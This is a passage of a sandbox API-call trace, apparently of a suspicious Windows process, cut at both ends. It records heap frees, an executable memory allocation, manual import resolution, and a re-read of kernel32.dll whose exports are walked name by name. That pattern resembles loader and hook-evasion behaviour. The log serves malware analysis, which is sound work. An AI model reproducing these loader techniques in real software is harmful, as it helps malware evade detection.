returned 1 [0275.249] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x29d2bc0 | out: hHeap=0x540000) returned 1 [0275.249] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x29e5dd0 | out: hHeap=0x540000) returned 1 [0275.249] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x29f8fe0 | out: hHeap=0x540000) returned 1 [0275.249] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2a0c1f0 | out: hHeap=0x540000) returned 1 [0275.253] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2a1f400 | out: hHeap=0x540000) returned 1 [0275.253] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2a32610 | out: hHeap=0x540000) returned 1 [0275.253] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2a45820 | out: hHeap=0x540000) returned 1 [0275.253] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2a58a30 | out: hHeap=0x540000) returned 1 [0275.253] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2a6bc40 | out: hHeap=0x540000) returned 1 [0275.255] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2a7ee50 | out: hHeap=0x540000) returned 1 [0275.255] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2a92060 | out: hHeap=0x540000) returned 1 [0275.255] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2aa5270 | out: hHeap=0x540000) returned 1 [0275.256] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2ab8480 | out: hHeap=0x540000) returned 1 [0275.256] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2acb690 | out: hHeap=0x540000) returned 1 [0275.256] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2ade8a0 | out: hHeap=0x540000) returned 1 [0275.256] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2af1ab0 | out: hHeap=0x540000) returned 1 [0275.256] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2b04cc0 | out: hHeap=0x540000) returned 1 [0275.256] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2b17ed0 | out: hHeap=0x540000) returned 1 [0275.410] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2b2b0e0 | out: hHeap=0x540000) returned 1 [0275.410] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2b3e2f0 | out: hHeap=0x540000) returned 1 [0275.410] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2b51500 | out: hHeap=0x540000) returned 1 [0275.410] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2b64710 | out: hHeap=0x540000) returned 1 [0275.410] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2b77920 | out: hHeap=0x540000) returned 1 [0275.410] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2b8ab30 | out: hHeap=0x540000) returned 1 [0275.413] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2b9dd40 | out: hHeap=0x540000) returned 1 [0275.414] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2bb0f50 | out: hHeap=0x540000) returned 1 [0275.414] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2bc4160 | out: hHeap=0x540000) returned 1 [0275.414] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2bd7370 | out: hHeap=0x540000) returned 1 [0275.414] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2bea580 | out: hHeap=0x540000) returned 1 [0275.414] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2bfd790 | out: hHeap=0x540000) returned 1 [0275.414] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2c109a0 | out: hHeap=0x540000) returned 1 [0275.414] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2c23bb0 | out: hHeap=0x540000) returned 1 [0275.424] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2c36dc0 | out: hHeap=0x540000) returned 1 [0275.424] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2c49fd0 | out: hHeap=0x540000) returned 1 [0275.424] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2c5d1e0 | out: hHeap=0x540000) returned 1 [0275.424] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2c703f0 | out: hHeap=0x540000) returned 1 [0275.424] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2c83600 | out: hHeap=0x540000) returned 1 [0275.424] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2c96810 | out: hHeap=0x540000) returned 1 [0275.426] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2ca9a20 | out: hHeap=0x540000) returned 1 [0275.427] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2cbcc30 | out: hHeap=0x540000) returned 1 [0275.427] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2ccfe40 | out: hHeap=0x540000) returned 1 [0275.427] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2ce3050 | out: hHeap=0x540000) returned 1 [0275.428] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2cf6260 | out: hHeap=0x540000) returned 1 [0275.428] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d09470 | out: hHeap=0x540000) returned 1 [0275.428] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d1c680 | out: hHeap=0x540000) returned 1 [0275.428] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d2f890 | out: hHeap=0x540000) returned 1 [0275.432] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d42aa0 | out: hHeap=0x540000) returned 1 [0275.432] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d55cb0 | out: hHeap=0x540000) returned 1 [0275.432] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d68ec0 | out: hHeap=0x540000) returned 1 [0275.432] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d7c0d0 | out: hHeap=0x540000) returned 1 [0275.432] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2d8f2e0 | out: hHeap=0x540000) returned 1 [0275.435] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2da24f0 | out: hHeap=0x540000) returned 1 [0275.436] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2db5700 | out: hHeap=0x540000) returned 1 [0275.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2dc8910 | out: hHeap=0x540000) returned 1 [0275.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2df0080 | out: hHeap=0x540000) returned 1 [0275.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2e03290 | out: hHeap=0x540000) returned 1 [0275.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2e164a0 | out: hHeap=0x540000) returned 1 [0275.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2e296b0 | out: hHeap=0x540000) returned 1 [0275.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2e3c8c0 | out: hHeap=0x540000) returned 1 [0275.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2e4fad0 | out: hHeap=0x540000) returned 1 [0275.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2e62ce0 | out: hHeap=0x540000) returned 1 [0275.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2e75ef0 | out: hHeap=0x540000) returned 1 [0275.437] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2e89100 | out: hHeap=0x540000) returned 1 [0275.443] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2e9c310 | out: hHeap=0x540000) returned 1 [0275.445] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2eaf520 | out: hHeap=0x540000) returned 1 [0275.445] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2ec2730 | out: hHeap=0x540000) returned 1 [0275.445] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2ed5940 | out: hHeap=0x540000) returned 1 [0275.445] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2ee8b50 | out: hHeap=0x540000) returned 1 [0275.449] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2efbd60 | out: hHeap=0x540000) returned 1 [0275.450] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2f0ef70 | out: hHeap=0x540000) returned 1 [0275.450] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2f22180 | out: hHeap=0x540000) returned 1 [0275.450] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2f35390 | out: hHeap=0x540000) returned 1 [0275.450] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2f485a0 | out: hHeap=0x540000) returned 1 [0275.450] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2f5b7b0 | out: hHeap=0x540000) returned 1 [0275.561] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2f6e9c0 | out: hHeap=0x540000) returned 1 [0275.562] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2f81bd0 | out: hHeap=0x540000) returned 1 [0275.562] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2f94de0 | out: hHeap=0x540000) returned 1 [0275.562] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2fa7ff0 | out: hHeap=0x540000) returned 1 [0275.562] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2fbb200 | out: hHeap=0x540000) returned 1 [0275.562] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2fce410 | out: hHeap=0x540000) returned 1 [0275.562] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2fe1620 | out: hHeap=0x540000) returned 1 [0275.562] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x2ff4830 | out: hHeap=0x540000) returned 1 [0275.566] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3007a40 | out: hHeap=0x540000) returned 1 [0275.566] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x301ac50 | out: hHeap=0x540000) returned 1 [0275.567] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x302de60 | out: hHeap=0x540000) returned 1 [0275.567] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3041070 | out: hHeap=0x540000) returned 1 [0275.567] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3054280 | out: hHeap=0x540000) returned 1 [0275.567] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3067490 | out: hHeap=0x540000) returned 1 [0275.567] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x307a6a0 | out: hHeap=0x540000) returned 1 [0275.567] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x308d8b0 | out: hHeap=0x540000) returned 1 [0275.567] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x30a0ac0 | out: hHeap=0x540000) returned 1 [0275.567] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x30b3cd0 | out: hHeap=0x540000) returned 1 [0275.567] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x30c6ee0 | out: hHeap=0x540000) returned 1 [0275.568] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x30da0f0 | out: hHeap=0x540000) returned 1 [0275.571] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x30ed300 | out: hHeap=0x540000) returned 1 [0275.573] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3100510 | out: hHeap=0x540000) returned 1 [0275.576] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3113720 | out: hHeap=0x540000) returned 1 [0276.221] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0276.225] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0276.225] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0276.226] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0276.226] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0276.226] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0276.226] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0276.226] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0276.227] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0276.227] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0276.227] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0276.227] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0276.227] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0276.228] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0276.228] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0276.228] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0276.228] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0276.228] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0276.228] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0276.228] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0276.229] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0276.229] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0276.229] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0276.229] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0276.229] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0276.229] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0276.230] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0276.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56db40 | out: hHeap=0x540000) returned 1 [0276.230] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0276.235] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x550e50 | out: hHeap=0x540000) returned 1 [0276.373] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0276.373] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0276.373] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0276.373] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0276.374] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0276.374] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0276.376] GetProcessHeap () returned 0x540000 [0276.376] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x68) returned 0x548d40 [0276.377] GetProcessHeap () returned 0x540000 [0276.377] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x559260 [0276.378] GetProcessHeap () returned 0x540000 [0276.378] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x48) returned 0x550450 [0276.378] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0276.378] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0276.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0276.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0276.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0276.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0276.379] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0276.379] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0276.380] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0276.380] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0276.380] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0276.380] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0276.381] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0276.381] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0276.381] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0276.381] GetProcessHeap () returned 0x540000 [0276.381] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xac430) returned 0x56c5f0 [0276.383] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0276.384] ReadFile (in: hFile=0x134, lpBuffer=0x56c5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x56c5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0276.407] CloseHandle (hObject=0x134) returned 1 [0276.407] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0276.413] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0276.413] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0276.413] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0276.413] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0276.413] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0276.413] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0276.414] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0276.414] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0276.414] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0276.414] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0276.414] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0276.414] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0276.414] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0276.414] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0276.414] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0276.414] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0276.414] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0276.414] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0276.414] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0276.414] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0276.414] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0276.414] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0276.414] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0276.414] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0276.414] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0276.414] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0276.415] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0276.415] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0276.415] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0276.415] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0276.415] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0276.415] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0276.415] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0276.415] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0276.415] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0276.415] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0276.415] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0276.415] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0276.415] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0276.415] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0276.415] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0276.415] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0276.415] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0276.415] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0276.415] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0276.415] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0276.415] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0276.415] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0276.416] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0276.417] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0276.417] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0276.417] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0276.417] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0276.417] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0276.417] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0276.418] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0276.418] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0276.418] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0276.418] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0276.418] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0276.418] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0276.418] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0276.418] lstrcmpA (lpString1="AddRefActCtxWorker", 